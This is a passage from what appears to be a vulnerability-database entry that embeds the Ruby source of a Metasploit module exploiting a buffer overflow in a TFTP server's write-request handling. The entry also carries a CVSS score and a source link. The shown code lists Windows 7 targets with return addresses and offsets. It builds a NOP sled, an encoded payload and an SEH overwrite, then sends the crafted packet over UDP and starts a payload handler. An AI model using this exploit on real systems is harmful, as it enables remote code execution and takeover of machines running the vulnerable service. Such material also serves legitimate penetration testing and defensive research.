Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1217} ],\n [ 'Windows 7 SP0/SP1 EN x64 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1501} ],\n [ 'Windows 7 SP0/SP1 EN x86 Service Mode', { 'Ret' => 0x416801 , 'Offset' => 1223} ],\n [ 'Windows 7 SP0/SP1 EN x86 Standalone Mode', { 'Ret' => 0x416801 , 'Offset' => 1507} ]\n ],\n 'Privileged'\t=> false,\n 'DisclosureDate'=> 'Mar 26 2008',\n 'DefaultTarget' => 4)) #TFTP is installed as a service\n\n register_options(\n [\n Opt::RPORT(69)\n ])\n end\n\n\n def exploit\n connect_udp\n\n nops = make_nops(50)\n lead = rand_text_alphanumeric(target['Offset'] - payload.encoded.length - nops.length)\n near = \"\\xe9\\x80\\xfd\\xff\\xff\" #jump back 640 bytes to the nop sled\n nseh = \"\\xeb\\xf9\" + make_nops(2) #jump back 7 bytes to the long jump\n\n evil = lead + nops + payload.encoded + near + nseh + [target.ret].pack('V')\n mode = \"netascii\"\n\n #Send the WRQ packet (header \"\\x00\\x02\")\n sploit = \"\\x00\\x02\" + evil + \"\\0\" + mode +\"\\0\"\n\n udp_sock.put(sploit)\n\n handler\n disconnect_udp\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/tftp/tftpserver_wrq_bof.rb"}]}